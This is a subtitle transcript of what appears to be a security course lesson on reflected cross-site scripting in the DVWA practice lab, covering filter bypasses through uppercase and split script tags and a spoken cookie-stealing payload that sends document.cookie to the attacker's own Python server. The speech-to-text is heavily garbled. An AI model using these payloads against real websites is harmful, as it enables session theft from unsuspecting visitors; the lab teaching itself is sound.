1
00:00:00,300 --> 00:00:06,090
Welcome back, I want to talk about another vulnerability that we mentioned in the terror video, and

2
00:00:06,090 --> 00:00:08,010
that is cross site scripting.

3
00:00:08,520 --> 00:00:15,360
If you remember, this is a vulnerability for if we execute code due to poor user input filtering in

4
00:00:15,360 --> 00:00:21,750
this attack, it is not the server that is getting targeted, but the users that visit that website.

5
00:00:22,780 --> 00:00:30,850
There are three main types of access attack there is reflected exercice stored access and dorm based

6
00:00:30,850 --> 00:00:38,200
access and in this course will be covering first two, which are reflected and stored access.

7
00:00:38,980 --> 00:00:45,760
But before we do that, let's quickly remind ourselves of a scenario as to how this attack looks like.

8
00:00:46,420 --> 00:00:49,660
So the attacker finds an access vulnerability.

9
00:00:50,050 --> 00:00:54,910
They inject JavaScript code that they want to target to execute inside of their browsers.

10
00:00:55,270 --> 00:01:01,510
And then anyone who visits that Web page will execute the JavaScript code that you injected.

11
00:01:02,460 --> 00:01:09,840
This is an example of stored access where the victim doesn't have to click on any links, all they need

12
00:01:09,840 --> 00:01:15,750
to do is to visit the same page on their own and they will execute that script that you injected.

13
00:01:16,680 --> 00:01:18,420
So how does this work?

14
00:01:18,960 --> 00:01:25,450
Well, this is possible only in case the script that you injected is getting stored on the server.

15
00:01:26,190 --> 00:01:32,010
This will most likely be there is, for example, a page where you need to type in some type of a comment.

16
00:01:32,010 --> 00:01:34,190
And then that comment will show on that page.

17
00:01:34,860 --> 00:01:40,680
If that comment input is vulnerable, then you most likely will have a stored access because anyone

18
00:01:40,680 --> 00:01:44,800
loading that page after that will load your comment as well.

19
00:01:44,820 --> 00:01:48,940
And if your comment was a JavaScript code, they will execute that code.

20
00:01:49,620 --> 00:01:50,670
So what does this mean?

21
00:01:50,730 --> 00:01:56,790
Well, this means once you inject it, it will stay on the server and server will host that page with

22
00:01:56,790 --> 00:02:00,720
malicious JavaScript code to anyone trying to visit it.

23
00:02:01,810 --> 00:02:08,290
On the other hand, reflected access is a little bit different, it won't work on anyone that visits

24
00:02:08,290 --> 00:02:08,790
the page.

25
00:02:08,950 --> 00:02:12,880
It will only work if you send a link with malicious code to someone.

26
00:02:13,630 --> 00:02:19,480
In this scenario, the server doesn't store our injected code on their site, so it won't be hosting

27
00:02:19,480 --> 00:02:20,690
the page with our code.

28
00:02:21,400 --> 00:02:25,000
However, the code injection vulnerability could still exist.

29
00:02:25,450 --> 00:02:31,570
If we find it, then we would craft our JavaScript code that we want victims to execute and we would

30
00:02:31,570 --> 00:02:34,120
send those links to anyone that we want.

31
00:02:34,810 --> 00:02:41,260
Once they click on the link and open the website page, our JavaScript code will also get executed.

32
00:02:41,740 --> 00:02:48,580
Now, these types of attacks are usually used for sessions dealing or by attackers to mine on target

33
00:02:48,580 --> 00:02:50,940
species and create a botnet.

34
00:02:51,460 --> 00:02:57,650
But our goal is to just find the bug itself and we will demonstrate how kookiest works later.

35
00:02:58,510 --> 00:02:59,890
Let's get straight into it.

36
00:03:00,520 --> 00:03:04,200
OK, so the thing that we need is our anticipatable running.

37
00:03:04,240 --> 00:03:12,250
I got it already up and we also need to w a pitch, make sure that you have purposes running with intercept

38
00:03:12,250 --> 00:03:12,940
turned off.

39
00:03:13,210 --> 00:03:19,510
And once you do all of that, you want to navigate to the access reflected right here, because this

40
00:03:19,510 --> 00:03:22,990
is the first example of access that we are going to cover in this video.

41
00:03:23,650 --> 00:03:30,160
Another thing that you want to do is you want to set the security level to be low for our first example.

42
00:03:30,430 --> 00:03:35,620
And let's give it a try to figure out whether this even has an excess vulnerability.

43
00:03:36,370 --> 00:03:38,500
So what is this application do?

44
00:03:39,250 --> 00:03:42,940
Well, here, it asks us to input our name.

45
00:03:43,270 --> 00:03:49,580
So I will just go and type here, Aleksa inside of this input just to see what happens.

46
00:03:49,600 --> 00:03:50,980
So if I click on submit.

47
00:03:52,580 --> 00:03:59,870
OK, so it prints out hello, Alexa, what a welcoming application, right, and this right here is

48
00:03:59,870 --> 00:04:02,110
an example of how it should work.

49
00:04:02,120 --> 00:04:06,540
You type in your name, it will welcome you with hello and then your name.

50
00:04:07,190 --> 00:04:15,410
However, what happens once we try to inject JavaScript code, the most simple JavaScript code and what

51
00:04:15,410 --> 00:04:20,050
we usually do first ones hunting for access is type this code.

52
00:04:20,360 --> 00:04:22,870
So let me go in terminal just so you can see it better.

53
00:04:23,330 --> 00:04:32,600
So this arrow to the left then script arrow to the right alert and inside of the brackets we put one

54
00:04:32,600 --> 00:04:39,710
between single quotes or you can actually put anything you want and you close the script text.

55
00:04:40,580 --> 00:04:43,190
And this right here is a JavaScript code.

56
00:04:43,970 --> 00:04:47,210
It tells the page to alert us with number one.

57
00:04:47,480 --> 00:04:50,620
And once again, you can specify anything between these quotes.

58
00:04:51,410 --> 00:04:52,620
So what does this mean?

59
00:04:53,000 --> 00:04:59,180
This means it will open that small popup window at the top of the page where it should print out one.

60
00:04:59,690 --> 00:05:06,380
And these script tags right here are just a way for us to tell the Web page, hey, anything that's

61
00:05:06,380 --> 00:05:11,600
inside of these script you should read as JavaScript code and not HTML code.

62
00:05:12,380 --> 00:05:16,640
And this at the end is just the closed script, which is telling the Web page.

63
00:05:16,640 --> 00:05:18,680
Here is where JavaScript code ends.

64
00:05:19,690 --> 00:05:25,990
This alert is a JavaScript function that will alert whatever is inside of these brackets, so let's

65
00:05:25,990 --> 00:05:32,170
give it a try and let's input this inside of our user input instead of a name, our Kopit.

66
00:05:33,500 --> 00:05:36,950
Go to my page and paste it right here.

67
00:05:37,840 --> 00:05:41,890
So script, alert and closed script, I click on Submit.

68
00:05:43,220 --> 00:05:50,920
And here it is, we have access vulnerability since it ran our code and it opened this small window,

69
00:05:51,080 --> 00:05:54,040
we can see it says one, which is what we alerted.

70
00:05:54,560 --> 00:06:00,930
Well, this was pretty easy since this was in low settings, we can assume no user input was filtered.

71
00:06:00,950 --> 00:06:03,020
Therefore, we managed to execute this.

72
00:06:03,530 --> 00:06:09,140
And as easy as this looks like, there are many, many pages that are currently on Internet that are

73
00:06:09,200 --> 00:06:10,940
vulnerable to this type of bug.

74
00:06:11,160 --> 00:06:13,100
Even with this simple script.

75
00:06:13,820 --> 00:06:21,290
And as harmless as this looks, it can be used to do some serious damage on client side, depending

76
00:06:21,290 --> 00:06:23,930
on what exactly you send them as JavaScript code.

77
00:06:24,910 --> 00:06:30,010
Let me show you what I mean, what you would do after actually creating the excess vulnerability and

78
00:06:30,010 --> 00:06:38,170
finding it, you would copy the code with the JavaScript code that you injected and anyone that clicks

79
00:06:38,170 --> 00:06:38,650
on the link.

80
00:06:38,660 --> 00:06:41,350
So I will just similarly try to hear someone clicking on the link.

81
00:06:41,350 --> 00:06:43,180
They click on the link that you send.

82
00:06:43,300 --> 00:06:44,260
They press enter.

83
00:06:45,010 --> 00:06:48,960
They will also execute that JavaScript code, as we can see right here.

84
00:06:49,270 --> 00:06:52,900
They will also get a pop up window that says one.

85
00:06:53,620 --> 00:06:56,200
And this is a reflected crosseyed scripting attack.

86
00:06:56,620 --> 00:06:59,830
Anyone that opens this link will also execute this.

87
00:07:00,130 --> 00:07:03,120
They do not have to type the JavaScript code themselves.

88
00:07:03,850 --> 00:07:04,890
Now that we did this.

89
00:07:04,900 --> 00:07:08,650
Let us also take a quick look at the source code of this page.

90
00:07:09,040 --> 00:07:11,740
So I will open the source.

91
00:07:11,740 --> 00:07:15,520
And here is the code for this specific page.

92
00:07:16,330 --> 00:07:19,380
And they just paste our input right here.

93
00:07:19,900 --> 00:07:22,600
They don't perform any filtering whatsoever.

94
00:07:23,260 --> 00:07:29,230
Now that we cover the low security level, let's try to find access in a medium level security to see

95
00:07:29,230 --> 00:07:30,010
if it works.

96
00:07:30,010 --> 00:07:38,020
So we'll close this, go to the DV w a security and I will change from low to medium click on submit

97
00:07:38,680 --> 00:07:40,930
and this will change everything to a medium.

98
00:07:41,590 --> 00:07:48,310
So let's go back to access reflected and let's first type the name to see whether it gives the same

99
00:07:48,340 --> 00:07:50,680
output and it does it printouts.

100
00:07:50,680 --> 00:07:51,060
Hello.

101
00:07:51,100 --> 00:07:51,970
And then the name.

102
00:07:52,480 --> 00:07:57,160
So now let's try the same script that we did with the low security.

103
00:07:57,160 --> 00:08:05,350
So open script text alert one and I will close script text click on submit.

104
00:08:06,370 --> 00:08:12,430
Hmmm, it seems that they actually remove the script tax we can only see right here.

105
00:08:12,460 --> 00:08:18,160
Hello, alert one and it doesn't give us a pop up window that says what this means.

106
00:08:18,280 --> 00:08:24,490
There is some type of filtering performed onto this page because we don't get that window and our code

107
00:08:24,490 --> 00:08:25,810
doesn't get executed.

108
00:08:26,600 --> 00:08:34,160
By the output of our application, we can assume that the filtering performs, removing of script packs

109
00:08:34,430 --> 00:08:37,350
and usually this type of filtering that you will encounter.

110
00:08:37,370 --> 00:08:37,730
Why?

111
00:08:38,090 --> 00:08:44,270
Well, because script tags automatically mean to the Web page that JavaScript code is coming through.

112
00:08:44,270 --> 00:08:48,940
Some Web pages perform filtering just by removing this script tax.

113
00:08:49,700 --> 00:08:52,340
But let's see whether they filter it well enough.

114
00:08:52,820 --> 00:09:02,000
They seem to filtered script like this, but have they filtered script like this?

115
00:09:02,630 --> 00:09:04,730
What if I write it in capital letters?

116
00:09:05,100 --> 00:09:06,980
Will that also be filtered?

117
00:09:07,340 --> 00:09:08,200
Let's give it a try.

118
00:09:08,240 --> 00:09:16,850
If I type the script and then alert and I also close the script with capital letters, click on Submit.

119
00:09:17,770 --> 00:09:26,200
And here it is, we got it to run once again, so all we had to do was write scripts in capital letters.

120
00:09:26,930 --> 00:09:29,880
They only filtered out lower letter, case, script.

121
00:09:30,400 --> 00:09:35,910
Let's make sure that that is the case by going and visiting the source code and let's see what they

122
00:09:35,920 --> 00:09:36,160
did.

123
00:09:36,880 --> 00:09:39,340
And here it is inside the print statement.

124
00:09:39,700 --> 00:09:46,480
They use the string replace function onto the script tax and replaced it with empty space.

125
00:09:46,480 --> 00:09:49,090
And that is the reason why we did the first example.

126
00:09:49,300 --> 00:09:51,300
We didn't get the script printed out.

127
00:09:51,310 --> 00:09:55,690
We only got one printed out since they removed our script tax.

128
00:09:56,410 --> 00:10:00,220
But we managed to bypass this with capital script letters.

129
00:10:01,120 --> 00:10:06,400
But what would happen if they, for example, also filtered the capital script letters?

130
00:10:07,000 --> 00:10:09,370
Well, then we could do something like this.

131
00:10:09,880 --> 00:10:14,200
We could type and let me write it first in terminal, just so you can see it better.

132
00:10:15,380 --> 00:10:24,080
We could write something like this ACR and then open another left arrow script close right there, and

133
00:10:24,080 --> 00:10:31,930
then IPT close another right, terror alert one and close script attacks.

134
00:10:32,540 --> 00:10:38,480
And the reason why we are writing scripts like this is because our Web page only filters the opening

135
00:10:38,480 --> 00:10:39,150
script text.

136
00:10:39,230 --> 00:10:40,490
It only filters this.

137
00:10:40,520 --> 00:10:43,090
It doesn't filter closed script text.

138
00:10:43,880 --> 00:10:45,470
So what did we do right here?

139
00:10:45,560 --> 00:10:46,680
Why would this work?

140
00:10:46,880 --> 00:10:52,190
Well, before I explain it, let me first give it a try onto the Web page just to see if it would work.

141
00:10:52,520 --> 00:10:54,120
And it does indeed work.

142
00:10:54,620 --> 00:11:02,600
So what they essentially did right here is they split this script tag into two pieces and what the Web

143
00:11:02,600 --> 00:11:06,130
page does, it only filters out entire script.

144
00:11:06,620 --> 00:11:12,860
So what the Web page would do is it would see this opening bracket, then script and closing bracket.

145
00:11:12,860 --> 00:11:17,280
It would remove it, but then we would still be left with a script.

146
00:11:17,570 --> 00:11:22,900
So if I go right here and let's pretend that we're at the Web page will filter out the opening script.

147
00:11:23,060 --> 00:11:24,020
So let's remove this.

148
00:11:24,920 --> 00:11:26,210
And what do we get?

149
00:11:26,450 --> 00:11:33,450
Well, we get another opening script tag that wont be removed, and that is why this would work as well.

150
00:11:34,190 --> 00:11:34,660
Great.

151
00:11:34,820 --> 00:11:40,140
Now let the see the attack where we still cookies from the person that visits our link.

152
00:11:40,700 --> 00:11:46,250
Those cookies could then be used to steal their session and possibly enter their online account on that

153
00:11:46,250 --> 00:11:46,780
website.

154
00:11:47,150 --> 00:11:54,290
If the website session management is also poor right now, we will see only how to get that cookie with

155
00:11:54,290 --> 00:11:55,340
Crosseyed scripting.

156
00:11:55,790 --> 00:12:02,990
So to do this, we must first see where are we going to receive the cookie value so they will execute

157
00:12:02,990 --> 00:12:05,620
the code and our code will extract a cookie.

158
00:12:05,900 --> 00:12:09,260
But where is it going to send it for this?

159
00:12:09,380 --> 00:12:16,630
We're going to start a small python http server that we will send the cookie to show how to do that.

160
00:12:16,880 --> 00:12:21,950
Well, we can go inside of our terminal and just type the command python dash and.

161
00:12:23,050 --> 00:12:31,030
And then simple FTP server and then the port number where we want to host it, let's say port number

162
00:12:31,030 --> 00:12:41,530
eight thousand, if I press enter, this will start the server on all interfaces on Port eight thousand,

163
00:12:42,280 --> 00:12:46,960
then the malicious JavaScript code that we want to inject is this right here.

164
00:12:47,110 --> 00:12:51,940
I will first write it in another terminal and then we're going to keep it inside of the page.

165
00:12:52,780 --> 00:12:58,000
So we must first start with capital script because we are on medium level.

166
00:12:58,180 --> 00:12:59,830
The regular script won't work.

167
00:13:00,040 --> 00:13:08,890
Then we can type document dot right open brackets then type one single quote open another left arrow

168
00:13:08,890 --> 00:13:19,600
and image source equals open double quotes, HTP Eglash and then the IP address of our Linux machine

169
00:13:20,080 --> 00:13:27,160
and then the port on which we are running that Python server, which in my case is eight thousand.

170
00:13:27,610 --> 00:13:35,860
Then we can add another inclose single quote after it with add a plus and then document that cookie.

171
00:13:37,670 --> 00:13:44,960
After that space and another plus and after that comes single quote, space, double quote, clothes,

172
00:13:44,960 --> 00:13:52,000
Retiro, another single quote, close bracket dot and comma, and then the close script tax.

173
00:13:52,780 --> 00:13:54,820
OK, I know what you're thinking.

174
00:13:55,130 --> 00:13:56,750
What even is this?

175
00:13:57,110 --> 00:14:02,140
And this can be a little bit challenging for someone who never encountered JavaScript before.

176
00:14:02,480 --> 00:14:05,390
However, this is just JavaScript syntax.

177
00:14:05,930 --> 00:14:07,570
It's just the programming language.

178
00:14:08,000 --> 00:14:12,620
And after a few times trying access, you will pretty much get used to it.

179
00:14:12,620 --> 00:14:15,650
And it won't be that weird looking once you write it.

180
00:14:15,980 --> 00:14:21,710
Since I assume that for anyone that has encountered this before, this looks pretty terrible.

181
00:14:21,980 --> 00:14:26,990
But what we are essentially doing right here is we are opening script text in capital letters because

182
00:14:26,990 --> 00:14:28,310
of the filtering on our page.

183
00:14:28,670 --> 00:14:34,010
And then we are writing the document, that kookie, which is the cookie session of the user visiting

184
00:14:34,010 --> 00:14:39,130
that page and running this code and sending that to the IP address on PT..

185
00:14:39,140 --> 00:14:43,670
Eight thousand, since that is where we are running our Python server.

186
00:14:44,180 --> 00:14:51,080
And here we should get printed out the cookie session ID once someone visits our link with this JavaScript

187
00:14:51,080 --> 00:14:51,410
code.

188
00:14:52,070 --> 00:14:56,420
And at the end all we are doing is we're closing the script tax.

189
00:14:57,340 --> 00:15:04,660
So let's give it a try and found this in our user input cockpit once again, go to our page and type

190
00:15:04,660 --> 00:15:08,500
it here if I press, enter or submit.

191
00:15:09,880 --> 00:15:16,960
Well, nothing seems to happen right here, but if I go to my Web server, here it is, here is our

192
00:15:16,960 --> 00:15:18,090
target cookie.

193
00:15:18,550 --> 00:15:21,850
Here is an ID and that is the cookie value.

194
00:15:22,000 --> 00:15:28,180
It even tells right here that we got the security on medium and this is something that we might be able

195
00:15:28,180 --> 00:15:29,920
to use to steal their session.

196
00:15:30,320 --> 00:15:32,340
However, more about that later.

197
00:15:32,650 --> 00:15:38,100
For now, we so how to find the access vulnerability in both low and medium security level.

198
00:15:38,440 --> 00:15:42,290
As I said, this can be one of the most challenging parts of the course.

199
00:15:42,430 --> 00:15:48,730
However, if there is anything you don't quite forget, feel free to post the question so we can clarify

200
00:15:48,730 --> 00:15:50,890
it even more and make it understandable.

201
00:15:51,640 --> 00:15:52,030
Great.

202
00:15:52,300 --> 00:15:55,600
In the next video, we're going to do this same vulnerability.

203
00:15:55,990 --> 00:16:00,480
Just we're going to see how it would look like if it was us toward access.

204
00:16:01,150 --> 00:16:07,210
Remember this what we covered is called reflected access and Target will only execute the code if they

205
00:16:07,210 --> 00:16:09,760
open the link with our JavaScript code.

206
00:16:10,240 --> 00:16:15,910
In the next video, we'll see the vulnerability for the JavaScript code gets stored on the server itself.